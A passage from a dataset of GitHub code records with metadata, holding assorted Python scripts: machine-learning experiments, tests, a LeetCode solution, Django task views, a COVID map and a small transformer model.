list(range(100, 301, 50))\n num_epochs = [1000]\n num_epochs.extend([5000 * 2 ** i for i in range(4)])\n\n for hidden_size in hidden_sizes:\n for num_epoch in num_epochs:\n job_name = \"\"\n # Modify the relevant parameter in params\n if learning_rate is not None:\n params.learning_rate = learning_rate\n job_name += \"learning_rate_{}_\".format(learning_rate)\n if hidden_size is not None:\n params.hidden_size = hidden_size\n job_name += \"hidden_size_{}_\".format(hidden_size)\n if dropout_rate is not None:\n params.dropout_rate = dropout_rate\n job_name += \"dropout_{}_\".format(dropout_rate)\n if num_epoch is not None:\n params.num_epochs = num_epoch\n job_name += \"num_epochs_{}_\".format(num_epoch)\n\n # Launch job (name has to be unique)\n # job_name = \"learning_rate_{}_hidden_size_{}_dropout_{}_num_epochs_{}\"\\\n # .format(learning_rate, hidden_size, dropout_rate, num_epochs)\n if not job_name is False:\n launch_training_job(args.parent_dir, args.data_dir, params.early_stop, job_name, params)\n else:\n print(\"no hyperparams chosen\")\n", "repo_name": "Hadar-Sha/Deep-Learning", "sub_path": "pytorch/schi/search_hyperparams.py", "file_name": "search_hyperparams.py", "file_ext": "py", "file_size_in_byte": 3998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.executable", "line_number": 13, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 49, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "utils.Params", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "10048921406", "text": "\n\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom reconstruction import reconstruct_pairs\nfrom reconstruction_utils.utils import extrinsic_vecs_to_matrix, extrinsic_matrix_to_vecs\nfrom pathlib import Path\n\nfrom tests.common_tests import arrays_equal\n\n\ndef test_reconstruction(intrinsics, distortion, xyz):\n \"\"\"\n testing 3D reconstruction working\n We create fake data by projecting a set of defined 3D points into\n 2 different camera views- one with extrinsics as all 0 and the other translated in the X dimension\n \"\"\"\n\n # Create reference points. This is in 3D, in camera space. i.e. along z-axis.\n #xyz = np.array([[0.0, 0.0, 200.0],\n # [0,0,100]])\n\n # Project points to first camera\n projected_points_1, _ = cv2.projectPoints(xyz,\n rvec=np.zeros((1, 3)), # No rotations or translations, so world coords==camera coords.\n tvec=np.zeros((1, 3)),\n cameraMatrix=intrinsics,\n distCoeffs=distortion)\n\n # defining extrinsics of second camera. Just translation in x.\n extrinsics_matrix = np.eye(4, 4)\n extrinsics_matrix[0][3] = 10\n rvec_1, tvec_1 = extrinsic_matrix_to_vecs(extrinsics_matrix)\n # RT 4x4 matrix between cam1 and cam 2\n RT = extrinsic_vecs_to_matrix(rvec_1, tvec_1)\n\n # Project to 2nd camera.\n projected_points_2, _ = cv2.projectPoints(xyz,\n rvec=rvec_1,\n tvec=tvec_1,\n cameraMatrix=intrinsics,\n distCoeffs=distortion)\n\n # undistorting 2d points\n kp1_matched = cv2.undistortPoints(projected_points_1.astype('float32'), intrinsics, distortion, None,\n intrinsics)\n kp2_matched = cv2.undistortPoints(projected_points_2.astype('float32'), intrinsics, distortion, None,\n intrinsics)\n\n kp1_matched = kp1_matched.squeeze(1).T # (2XN)\n kp2_matched = kp2_matched.squeeze(1).T # (2XN)\n\n # reconstruct points\n D3_points, colour_mask = reconstruct_pairs('opencv', kp1_matched, kp2_matched, intrinsics, RT)\n\n # Check reconstructed points equals original point\n print('orig')\n print(xyz)\n print('triang')\n print(D3_points.round())\n arrays_equal(xyz, D3_points)\n\n", "repo_name": "swishswish123/3D_reconstruction", "sub_path": "tests/test_reconstruction.py", "file_name": "test_reconstruction.py", "file_ext": "py", "file_size_in_byte": 2524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.projectPoints", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 33, "usage_type": "call"}, {"api_name": "reconstruction_utils.utils.extrinsic_matrix_to_vecs", "line_number": 35, "usage_type": "call"}, {"api_name": "reconstruction_utils.utils.extrinsic_vecs_to_matrix", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.projectPoints", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.undistortPoints", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.undistortPoints", "line_number": 49, "usage_type": "call"}, {"api_name": "reconstruction.reconstruct_pairs", "line_number": 56, "usage_type": "call"}, {"api_name": "tests.common_tests.arrays_equal", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "23022019379", "text": "from cifar10_web import cifar10\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nXtr, Ytr, Xte, Yte = cifar10(path=None)\n\n\nclass NearestNeighbor(object):\n def __init__(self):\n self.Ytr = None\n self.Xtr = None\n\n def train(self, X, y):\n \"\"\" X is N x D where each row is an example. Y is 1-dimension of size N \"\"\"\n # the nearest neighbor classifier simply remembers all the training data\n self.Xtr = X\n self.Ytr = y\n\n def predict(self, X):\n \"\"\" X is N x D where each row is an example we wish to predict label for \"\"\"\n # pre_all = []\n all_result = np.zeros((X.shape[0],10), dtype = int)\n print(all_result)\n for i in range(X.shape[0]):\n print(i)\n # print(X.shape)\n d1 = X[i] - self.Xtr\n # print(d1.shape)\n # print(\" \")\n d1 = np.absolute(d1)\n d1 = np.sum(d1, axis=1)\n # print(d1)\n result = np.argmin(d1)\n # print(result)\n pre = self.Ytr[result]\n # print(pre)\n # pre_all.append(pre)\n all_result[i] = pre\n print(pre)\n\n image = X[i].reshape(3, 32, 32)\n image = image.transpose(1, 2, 0)\n plt.imshow(image)\n\n closest_train_image = Xtr[result]\n image = closest_train_image.reshape(3, 32, 32)\n image = image.transpose(1, 2, 0)\n plt.figure()\n plt.imshow(image)\n plt.show()\n return all_result\n\n\ndef calc_accuracy(predict, gt):\n predict = np.argmax(predict, axis=1)\n gt = np.argmax(gt, axis=1)\n return np.mean(predict == gt) * 100.0\n\n\nnn = NearestNeighbor() # create a Nearest Neighbor classifier class\nnn.train(Xtr, Ytr) # train the classifier on the training images and labels\nYte_predict = nn.predict(Xte[0:10]) # predict labels on the test images\n\n# and now print the classification accuracy, which is the average number\n# of examples that are correctly predicted (i.e. label matches)\naccuracy = calc_accuracy(Yte_predict, Yte[0:10])\nprint('accuracy: ', accuracy)\nprint(Yte_predict)", "repo_name": "bethelmelesse/ComputerVisionCourse", "sub_path": "NearestNeigbour.py", "file_name": "NearestNeigbour.py", "file_ext": "py", "file_size_in_byte": 2148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cifar10_web.cifar10", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "72686821608", "text": "# This file is used to run a grid search algorithm to tune the SVM\n# to run in command line use : python gridsearch.py algorithm_file.csv 0\n#the file will take a moment before printing out \"Starting Script...\"\n\n# Libraries\nimport sys\nimport time\n#import datetime\nimport pandas as pd\n# from sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\n\n#Main--------------------------------------------------------------\nif __name__ == \"__main__\":\n # Pick model by uncommenting the appropriate line #\n\n print(\"Starting Script...\")\n #sys.argv[0] is the name of the script\n data_file = sys.argv[1]\n save = int(sys.argv[2])\n # model_name = str(sys.argv[3])\n \n #read in the data file\n data = pd.read_csv(data_file)\n X = data.drop('Class',axis = 1)\n y = data.Class\n \n #set up the grid search\n \n #parameters to tune\n k_list = ['rbf']#['linear','rbf','poly']#,'sigmoid']#,'precomputed']\n gam_list = [0.1]#,0.125]#['auto',0.01,0.1]#,.5,1,10,100]\n c_list = [220,300]#list(range(185,205,1))#[195,197,199]\n # deg_list = [1,2,3,4]#,5]\n\n #all together\n param_dict = dict(kernel=k_list,gamma=gam_list,C = c_list)\n\n #model\n model = SVC()\n\n grid = GridSearchCV(cv=3,estimator=model, param_grid=param_dict)\n start = time.time()\n grid.fit(X,y)\n end = time.time()\n runtime = end-start\n print('Minutes:',runtime/60) \n\n print(\"Best Score:\",grid.best_score_)\n print('Params:',grid.best_params_)\n \n if(save):\n #write paramater that were searched and the best selected and the date\n import datetime\n now = datetime.datetime.now()\n param_string = 'Params Searched:' + str(param_dict) #param dictionary\n grid_best_score = \"Best Score:\" + str(grid.best_score_)\n grid_best_parms = 'Best Params:' + str(grid.best_params_)\n \n filename = 'best_params.txt' #create file\n file_obj = open(filename,w)\n file_obj.write(\"Date/Time:\" + str(now)[:-7] + '\\n') #write the date\n file_obj.write(param_string + '\\n')\n file_obj.write(grid_best_score + '\\n')\n file_obj.write(grid_best_params + '\\n')\n \n file_obj.close()\n \n print('Params written to: ' + filename)\n \n\n print(\"End Script\")\n\n\n### End of Script ###\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "zachdtaylor/MathArticleCategorizer", "sub_path": "gridsearch.py", "file_name": "gridsearch.py", "file_ext": "py", "file_size_in_byte": 2384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 43, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "9355232210", "text": "import unittest\n\nfrom pymoo.algorithms.nsga2 import NSGA2\nfrom pymoo.algorithms.so_genetic_algorithm import GA\nfrom pymoo.factory import get_crossover, get_problem\nfrom pymoo.optimize import minimize\n\n\nclass CrossoverTest(unittest.TestCase):\n\n def test_crossover(self):\n\n for crossover in ['real_de', 'real_sbx', 'real_exp']:\n print(crossover)\n method = GA(pop_size=20, crossover=get_crossover(crossover, prob=0.95))\n minimize(get_problem(\"sphere\"), method, (\"n_gen\", 20))\n\n for crossover in ['bin_ux', 'bin_hux', 'bin_one_point', 'bin_two_point']:\n print(crossover)\n method = NSGA2(pop_size=20, crossover=get_crossover(crossover, prob=0.95))\n minimize(get_problem(\"zdt5\"), method, (\"n_gen\", 20))\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/tests/operators/test_crossover.py", "file_name": "test_crossover.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pymoo.algorithms.so_genetic_algorithm.GA", "line_number": 15, "usage_type": "call"}, {"api_name": "pymoo.factory.get_crossover", "line_number": 15, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 16, "usage_type": "call"}, {"api_name": "pymoo.factory.get_problem", "line_number": 16, "usage_type": "call"}, {"api_name": "pymoo.algorithms.nsga2.NSGA2", "line_number": 20, "usage_type": "call"}, {"api_name": "pymoo.factory.get_crossover", "line_number": 20, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 21, "usage_type": "call"}, {"api_name": "pymoo.factory.get_problem", "line_number": 21, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "72070909607", "text": "# 完全二叉树是每一层(除最后一层外)都是完全填充(即,节点数达到最大,第 n 层有 2ⁿ⁻¹ 个节点)的,并且所有的节点都尽可能地集中在左侧。 \n# \n# 设计一个用完全二叉树初始化的数据结构 CBTInserter,它支持以下几种操作: \n# \n# \n# CBTInserter(TreeNode root) 使用根节点为 root 的给定树初始化该数据结构; \n# CBTInserter.insert(int v) 向树中插入一个新节点,节点类型为 TreeNode,值为 v 。使树保持完全二叉树的状态,并返回插入的\n# 新节点的父节点的值; \n# CBTInserter.get_root() 将返回树的根节点。 \n# \n# \n# \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:inputs = [\"CBTInserter\",\"insert\",\"get_root\"], inputs = [[[1]],[2],[]]\n# 输出:[null,1,[1,2]]\n# \n# \n# 示例 2: \n# \n# \n# 输入:inputs = [\"CBTInserter\",\"insert\",\"insert\",\"get_root\"], inputs = [[[1,2,3,4,\n# 5,6]],[7],[8],[]]\n# 输出:[null,3,4,[1,2,3,4,5,6,7,8]]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 最初给定的树是完全二叉树,且包含 1 到 1000 个节点。 \n# 每个测试用例最多调用 CBTInserter.insert 操作 10000 次。 \n# 给定节点或插入节点的每个值都在 0 到 5000 之间。 \n# \n# \n# \n# \n# 注意:本题与主站 919 题相同: https://leetcode-cn.com/problems/complete-binary-tree-\n# inserter/ \n# Related Topics 树 广度优先搜索 设计 二叉树 👍 11 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\n\n\nclass CBTInserter:\n\n def __init__(self, root: TreeNode):\n self.root = root\n # 队列保存缺少 左 或者 左右 子节点的叶子节点。\n self.q = deque()\n self.q.append(root)\n while self.q[0].left and self.q[0].right:\n node = self.q.popleft()\n if node.left:\n self.q.append(node.left)\n if node.right:\n self.q.append(node.right)\n\n def insert(self, v: int) -> int:\n insert_node = TreeNode(val=v)\n node = self.q[0]\n if not node.left:\n # 节点没有左右叶子节点,则插入节点为左叶子节点\n node.left = insert_node\n else:\n # 有左叶子节点,没有右叶子节点\n node.right = insert_node\n self.q.append(node.left)\n self.q.append(node.right)\n self.q.popleft()\n return node.val\n\n def get_root(self) -> TreeNode:\n return self.root\n\n\n# Your CBTInserter object will be instantiated and called as such:\n# obj = CBTInserter(root)\n# param_1 = obj.insert(v)\n# param_2 = obj.get_root()\n# leetcode submit region end(Prohibit modification and deletion)\n", "repo_name": "zh805/algorithm", "sub_path": "leetcode/python/leetcode/editor/cn/[剑指 Offer II 043]往完全二叉树添加节点.py", "file_name": "[剑指 Offer II 043]往完全二叉树添加节点.py", "file_ext": "py", "file_size_in_byte": 2930, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "31628077130", "text": "import pandas as pd\nimport glob\nimport numpy as np\nimport math\nimport sys\nimport matplotlib.pyplot as plt\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str, default=\"\", help=\"input path\")\nparser.add_argument('--warmup', type=int, default=1, help=\"time in nanoseconds of the warmup\")\nargs = parser.parse_args()\n\ndef get_files(path):\n files = glob.glob(path+\"/*.csv\")\n files = [i for i in files]\n files.sort()\n return files\n\ndef get_names(files):\n names = []\n for file in files:\n if \"SMALL\" in file:\n names.append(\"SMALL\")\n if \"MEDIUM\" in file:\n names.append(\"MEDIUM\")\n if \"LARGE\" in file:\n names.append(\"LARGE\")\n return names\n\nfiles = get_files(args.input)\nnames = get_names(files)\nprint(files)\nprint(names)\n\napps = []\ntimes = []\n\nstat_to_plt = \"iout\"\n\nfor file in files[0:2]:\n c_title=\"time,vin,va,vb,vout,_vout_mean,vout_mean,iin,iout,proc_load,enable,prediction,ttn,rt\"\n df= pd.read_csv(file, header=None, names=c_title.split(\",\"))\n apps.append([i for i in np.array(df[stat_to_plt][args.warmup:])])\n times.append([i/1000 for i in np.array(df[\"time\"][args.warmup:])])\n print(len(times[-1]), len(apps[-1]))\n\nprint(len(apps),len(times))\n\nfig, axs = plt.subplots(1, 1, tight_layout=True)\nfig.set_size_inches(8,4)\nfor i, t, n in zip(apps, times, names):\n axs.plot(t, i, linewidth=1, label=n)\naxs.legend()\n#axs.set_yticks(np.arange(0.70,1.10,0.05))\naxs.set_xlabel(\"Time (ns)\")\n#axs.set_ylabel(\"Vout (V)\")\naxs.set_ylabel(\"Idevice (A)\")\nfig.suptitle(\"Device Current Swaptions 8c/8t Harvard PDN\")\nplt.show()\n", "repo_name": "atsmith3/predict-T", "sub_path": "python/analysis/i_plot_mc.py", "file_name": "i_plot_mc.py", "file_ext": "py", "file_size_in_byte": 1580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "72259532648", "text": "from django.shortcuts import get_object_or_404, redirect, render\n\nfrom profiles.models import ProfileCategory\nfrom tasks.forms import TaskForm\nfrom tasks.models import Task\n\n\ndef create_task_view(request, pk):\n task_list = get_object_or_404(ProfileCategory, pk=pk)\n if request.method == \"POST\":\n form = TaskForm(request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.task_list = task_list\n task.save()\n return redirect('list', pk=pk)\n else:\n form = TaskForm()\n return render(request, 'tasks/create-task.html', {'form': form})\n\n\ndef delete_task_view(request, pk, task_id):\n task = get_object_or_404(Task, pk=task_id)\n task.delete()\n return redirect('list', pk=pk)\n\n\ndef complete_task_view(request, pk, task_id):\n task = get_object_or_404(Task, pk=task_id)\n task.is_done = True\n task.save()\n return redirect('list', pk=pk)\n\n\ndef incomplete_task_view(request, pk, task_id):\n task = get_object_or_404(Task, pk=task_id)\n task.is_done = False\n task.save()\n return redirect('list', pk=pk)\n", "repo_name": "kaidenvlr/todo-app-django", "sub_path": "tasks/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1110, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 9, "usage_type": "call"}, {"api_name": "profiles.models.ProfileCategory", "line_number": 9, "usage_type": "argument"}, {"api_name": "tasks.forms.TaskForm", "line_number": 11, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "tasks.forms.TaskForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 23, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 29, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 29, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 36, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 36, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "38309442702", "text": "# Map to show the distribution of confirmed coronavirus cases across the world (circular markers).\n# Student Action: Run the code below.\n#Data Source https://github.com/CSSEGISandData/COVID-19/tree/master/csse_covid_19_data/csse_covid_19_time_series.git\nimport pandas as pd # Data processing \nimport matplotlib.pyplot as plt # Data visualisation\nimport folium # Cartograms / maps\nconf_csv = 'COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv'\nconf_df = pd.read_csv(conf_csv)\nworld_map = folium.Map(location=[0, 0], width='100%', height='80%', tiles='Stamen Toner', zoom_start=2.25)\nlast_col = conf_df.columns[-1]\nfor i in conf_df.index:\n folium.Circle(location=[conf_df.loc[i, 'Lat'], conf_df.loc[i, 'Long']], \n radius=int(conf_df.loc[i, last_col]), \n popup=conf_df.loc[i, 'Country/Region'] + '\\n' + str(conf_df.loc[i, last_col]),\n color='crimson', fill=True, fill_color='crimson').add_to(world_map)\nworld_map", "repo_name": "LPinto98/Data-Visualization-in-Python", "sub_path": "map.py", "file_name": "map.py", "file_ext": "py", "file_size_in_byte": 1000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 9, "usage_type": "call"}, {"api_name": "folium.Circle", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "74773841447", "text": "# See [video](https://youtu.be/kCc8FmEb1nY)\n# The colab repo is [here](https://colab.research.google.com/drive/1JMLa53HDuA-i7ZBmqV7ZnA3c_fvtXnx-?usp=sharing)\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\n# JEB: Ugly but will do for right now\nfrom config import get_device\ndevice = get_device()\n\nclass Head(nn.Module):\n \"\"\" one head of self-attention \"\"\"\n\n def __init__(self, head_size: int, n_embd: int, block_size: int, dropout: float):\n super().__init__()\n self.key = nn.Linear(n_embd, head_size, bias=False)\n self.query = nn.Linear(n_embd, head_size, bias=False)\n self.value = nn.Linear(n_embd, head_size, bias=False)\n self.register_buffer('tril', torch.tril(torch.ones(block_size, block_size)))\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n B, T, C = x.shape\n # Every single node is emiting a query and a key vector.\n # The Query vector is what I'm looking for.\n # The Key vector is what do I contain.\n k = self.key(x) # (B,T,C)\n q = self.query(x) # (B,T,C)\n # compute attention scores (\"affinities\")\n # The dot product between the key and the query. My query time the dot product of all the other tokens.\n # If the key and query are aligned, they will interact for a higher amount, and I'll learn about that\n # specific token. \n # We need to transpose the key but k has three dimensions. We only want to transpose the two last\n # dimensions.\n wei = q @ k.transpose(-2, -1) * C**-0.5 # (B, T, C) @ (B, C, T) -> (B, T, T)\n # We apply the upper triangular mask. Remove communications with future nodes.\n wei = wei.masked_fill(self.tril[:T, :T] == 0, float('-inf')) # (B, T, T)\n # We exponentiate and normalize. Each line has it sums of values . Remove communications with future nodes.\n wei = F.softmax(wei, dim=-1) # (B, T, T)\n wei = self.dropout(wei)\n # perform the weighted aggregation of the values.\n # x is the private information to this token. v is what I will communicate if you pesk me.\n v = self.value(x) # (B,T,C)\n out = wei @ v # (B, T, T) @ (B, T, C) -> (B, T, C)\n return out\n\n\nclass MultiHeadAttention(nn.Module):\n \"\"\" multiple heads of self-attention in parallel \"\"\"\n\n def __init__(self, num_heads: int, head_size: int, n_embd: int, block_size: int, dropout: float):\n super().__init__()\n self.heads = nn.ModuleList([Head(head_size, n_embd, block_size, dropout) for _ in range(num_heads)])\n self.proj = nn.Linear(n_embd, n_embd)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n out = torch.cat([h(x) for h in self.heads], dim=-1)\n out = self.dropout(self.proj(out))\n return out\n\n\nclass FeedFoward(nn.Module):\n \"\"\" a simple linear layer followed by a non-linearity \"\"\"\n\n def __init__(self, n_embd: int, dropout: float):\n super().__init__()\n self.net = nn.Sequential(\n # DFF is 4 time n_embd\n nn.Linear(n_embd, 4 * n_embd),\n nn.ReLU(),\n nn.Linear(4 * n_embd, n_embd),\n nn.Dropout(dropout),\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nclass Block(nn.Module):\n \"\"\" Transformer block: communication followed by computation \"\"\"\n\n def __init__(self, n_embd: int, n_head: int, block_size: int, dropout: float):\n # n_embd: embedding dimension, n_head: the number of heads we'd like\n super().__init__()\n head_size = n_embd // n_head\n self.sa = MultiHeadAttention(num_heads=n_head, head_size=head_size, n_embd=n_embd, block_size=block_size, dropout=dropout)\n self.ffwd = FeedFoward(n_embd=n_embd, dropout=dropout)\n self.ln1 = nn.LayerNorm(n_embd)\n self.ln2 = nn.LayerNorm(n_embd)\n\n def forward(self, x):\n # JEB: This is one of the only that changed compared to the original\n # paper. The normalization is made first in this model.\n x = x + self.sa(self.ln1(x))\n x = x + self.ffwd(self.ln2(x))\n return x\n\n# super simple bigram model\n\n\nclass Transformer8(nn.Module):\n\n def __init__(self, vocab_size: int, n_embd: int, n_layer: int, n_head: int, block_size: int, dropout: float):\n super().__init__()\n # each token directly reads off the logits for the next token from a lookup table\n self.token_embedding_table = nn.Embedding(vocab_size, n_embd)\n self.position_embedding_table = nn.Embedding(block_size, n_embd)\n self.blocks = nn.Sequential(*[Block(n_embd=n_embd, n_head=n_head, block_size=block_size, dropout=dropout) for _ in range(n_layer)])\n self.ln_f = nn.LayerNorm(n_embd) # final layer norm\n self.lm_head = nn.Linear(n_embd, vocab_size)\n self.block_size = block_size\n\n def forward(self, idx, targets=None):\n B, T = idx.shape\n # idx and targets are both (B,T) tensor of integers\n tok_emb = self.token_embedding_table(idx) # (B,T,C)\n pos_emb = self.position_embedding_table(torch.arange(T, device=device)) # (T,C)\n # JEB: Broadcasting. pos_emb gets right-aligned, a new dimension is added\n # and it gets added accross batch.\n x = tok_emb + pos_emb # (B,T,C)\n x = self.blocks(x) # (B,T,C)\n x = self.ln_f(x) # (B,T,C)\n logits = self.lm_head(x) # (B,T,vocab_size)\n\n if targets is None:\n loss = None\n else:\n #JEB: Interesting. This model computes the loss\n #in the forward method.\n B, T, C = logits.shape\n logits = logits.view(B*T, C)\n targets = targets.view(B*T)\n loss = F.cross_entropy(logits, targets)\n\n return logits, loss\n\n def generate(self, idx, max_new_tokens):\n # idx is (B, T) array of indices in the current context\n for _ in range(max_new_tokens):\n # crop idx to the last block_size tokens\n idx_cond = idx[:, -self.block_size:]\n # get the predictions. (We invoke forward here with a target)\n logits, loss = self(idx_cond)\n # focus only on the last time step\n logits = logits[:, -1, :] # becomes (B, C)\n # apply softmax to get probabilities\n probs = F.softmax(logits, dim=-1) # (B, C)\n # sample from the distribution\n idx_next = torch.multinomial(probs, num_samples=1) # (B, 1)\n # append sampled index to the running sequence\n idx = torch.cat((idx, idx_next), dim=1) # (B, T+1)\n return idx\n\n\ndef build_transformer8(tgt_vocab_size: int, d_model: int = 64, N: int = 4, h: int = 4, block_size: int = 32, dropout: float = 0.0, d_ff: int = 256) -> Transformer8:\n\n # Create the transformer\n transformer = Transformer8(vocab_size=tgt_vocab_size, n_embd=d_model, n_head=h,\n n_layer=N, block_size=block_size, dropout=dropout)\n\n # When computing the loss, we are ignoring cases when the label is the padding token\n # for params in transformer.parameters():\n # if params.dim() > 1:\n # nn.init.xavier_uniform_(params)\n\n return transformer\n", "repo_name": "prorates/pytorch-transformer-tutorials", "sub_path": "model8.py", "file_name": "model8.py", "file_ext": "py", "file_size_in_byte": 7225, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.get_device", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 